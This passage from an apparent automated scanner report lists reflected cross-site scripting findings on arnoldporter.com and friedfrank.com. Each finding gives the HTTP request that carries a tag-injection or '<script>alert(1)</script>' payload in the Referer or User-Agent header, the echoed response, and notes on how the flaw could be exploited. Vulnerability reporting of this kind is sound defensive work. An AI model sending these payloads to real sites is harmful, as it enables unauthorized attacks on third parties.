...[SNIP]...

4.191. http://www.arnoldporter.com/ [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94298"><a>ab34203c0ec was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document: in the excerpt below the "> in the payload closes the href attribute and the <a> start tag, and the remainder is emitted as markup. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place. Even without script execution, the page writes whatever Referer it receives into a link target, so a crafted referrer plants an attacker-chosen link in the page.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user: the victim's browser must be induced to send the crafted Referer, and browsers that follow the WHATWG URL standard percent-encode characters such as ", < and > in the URLs they send, so the raw payload used here was deliverable only because the scanner set the header directly; delivery via a link depends on the victim's browser. In the past, client-side technologies such as Flash could be used to make another user's browser send a request with an arbitrary HTTP header; where such a technique is available it can be leveraged to exploit the flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=94298"><a>ab34203c0ec

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:06:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=24313316;expires=Wed, 10-Apr-2041 01:06:54 GMT;path=/
Set-Cookie: CFTOKEN=10510270;expires=Wed, 10-Apr-2041 01:06:54 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP</title>
       <meta name="Description" content="Arnold &
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=94298"><a>ab34203c0ec">
...[SNIP]...

4.192. http://www.arnoldporter.com/events.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /events.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f757"><a>b17ba21f5e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user: the victim's browser must be induced to send the crafted Referer, and browsers that follow the WHATWG URL standard percent-encode ", < and > in the URLs they send, so delivery of the raw characters via a link depends on the victim's browser. In the past, client-side technologies such as Flash could be used to make another user's browser send a request with an arbitrary HTTP header; where such a technique is available it can be leveraged to exploit the flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /events.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=69495883; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24313245; __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=8f757"><a>b17ba21f5e0

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:51:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Seminars/Events</title>
       <meta name="Description"
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=8f757"><a>b17ba21f5e0">
...[SNIP]...

4.193. http://www.arnoldporter.com/experience.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /experience.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b23d"><a>17b8f11a572 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /experience.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=69495883; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24313245; __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=5b23d"><a>17b8f11a572

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:54:02 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Experience</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=5b23d"><a>17b8f11a572">
...[SNIP]...

4.194. http://www.arnoldporter.com/industries.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /industries.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1dc2"><a>c60c04f9f8c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /industries.cfm HTTP/1.1
Host: www.arnoldporter.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=e1dc2"><a>c60c04f9f8c
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=24313245; CFTOKEN=69495883; sifrFetch=true; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:10:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Industries</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=e1dc2"><a>c60c04f9f8c">
...[SNIP]...

4.195. http://www.arnoldporter.com/multimedia.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /multimedia.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f81da"><a>9596bd80369 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /multimedia.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=69495883; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24313245; __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=f81da"><a>9596bd80369

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:51:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Multimedia</title>
       <meta name="Description" conte
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=f81da"><a>9596bd80369">
...[SNIP]...

4.196. http://www.arnoldporter.com/practices.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /practices.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5548b"><a>9c4c29a21de was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /practices.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=69495883; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24313245; __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=5548b"><a>9c4c29a21de

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:50:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Practice Areas &amp; Industries</title>
       <meta nam
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=5548b"><a>9c4c29a21de">
...[SNIP]...

4.197. http://www.arnoldporter.com/press_releases.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /press_releases.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e451"><a>3e8da4e5dbe was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /press_releases.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=69495883; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24313245; __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=8e451"><a>3e8da4e5dbe

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:51:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Press Releases</title>
       <meta name="Description" c
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=8e451"><a>3e8da4e5dbe">
...[SNIP]...

4.198. http://www.arnoldporter.com/publications.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /publications.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0285"><a>8c4e66afe60 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /publications.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=69495883; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24313245; __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=a0285"><a>8c4e66afe60

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:51:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Publications</title>
       <meta name="Description" con
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=a0285"><a>8c4e66afe60">
...[SNIP]...

4.199. http://www.arnoldporter.com/search.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.arnoldporter.com
Path:   /search.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7da06"><a>93ef183841b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /search.cfm HTTP/1.1
Host: www.arnoldporter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CFTOKEN=69495883; __utmz=248117591.1303088780.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=24313245; __utma=248117591.1927048576.1303088780.1303088780.1303088780.1; __utmc=248117591; __utmb=248117591.1.10.1303088780; sifrFetch=true;
Referer: http://www.google.com/search?hl=en&q=7da06"><a>93ef183841b

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 18 Apr 2011 01:50:57 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/DTD/strict.dtd">

<html>
<head>
   
       <title>Arnold & Porter LLP - Search Form</title>
       <meta name="Description" cont
...[SNIP]...
<a href="http://www.google.com/search?hl=en&q=7da06"><a>93ef183841b">
...[SNIP]...

4.200. http://www.friedfrank.com/ [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.friedfrank.com
Path:   /

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 77d77<script>alert(1)</script>d7124e24d9 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.friedfrank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)77d77<script>alert(1)</script>d7124e24d9
Connection: close
Cookie: JSMOBILE=0; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=31349998; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.2.10.1303088795;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 18 Apr 2011 01:50:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)77d77<script>alert(1)</script>d7124e24d9</td>
...[SNIP]...

4.201. http://www.friedfrank.com/includes/vcard.cfm [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.friedfrank.com
Path:   /includes/vcard.cfm

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 1dfa8<script>alert(1)</script>89a12df46cb was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /includes/vcard.cfm HTTP/1.1
Host: www.friedfrank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1dfa8<script>alert(1)</script>89a12df46cb
Connection: close
Cookie: JSMOBILE=0; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=31349998; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.2.10.1303088795;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 18 Apr 2011 01:50:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1dfa8<script>alert(1)</script>89a12df46cb</td>
...[SNIP]...

4.202. http://www.friedfrank.com/index.cfm [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.friedfrank.com
Path:   /index.cfm

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload 8e740<script>alert(1)</script>1b6d2f1cdba was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /index.cfm HTTP/1.1
Host: www.friedfrank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8e740<script>alert(1)</script>1b6d2f1cdba
Connection: close
Cookie: JSMOBILE=0; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=31349998; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.2.10.1303088795;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 18 Apr 2011 01:50:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8e740<script>alert(1)</script>1b6d2f1cdba</td>
...[SNIP]...

4.203. http://www.friedfrank.com/printfriendly.cfm [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.friedfrank.com
Path:   /printfriendly.cfm

Issue detail

The value of the User-Agent HTTP header is copied into the HTML document as plain text between tags. The payload c2767<script>alert(1)</script>7516a2e75de was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /printfriendly.cfm HTTP/1.1
Host: www.friedfrank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c2767<script>alert(1)</script>7516a2e75de
Connection: close
Cookie: JSMOBILE=0; CFTOKEN=88414738; __utmz=113041875.1303088795.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); CFID=31349998; __utma=113041875.727875777.1303088795.1303088795.1303088795.1; __utmc=113041875; __utmb=113041875.2.10.1303088795;

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 18 Apr 2011 01:50:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<!-- " ---></TD></TD></TD></TH></TH></TH></TR></TR></TR></TABLE></TABLE></TABLE></A></ABBREV></ACRONYM></ADDRESS></APPLET></AU></B></BANNER></BIG></BLINK></BLOCKQUOTE></BQ></CAPTION></CENTER></CITE></
...[SNIP]...
<font style="COLOR: black; FONT: 8pt/11pt verdana">Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c2767<script>alert(1)</script>7516a2e75de</td>
...[SNIP]...
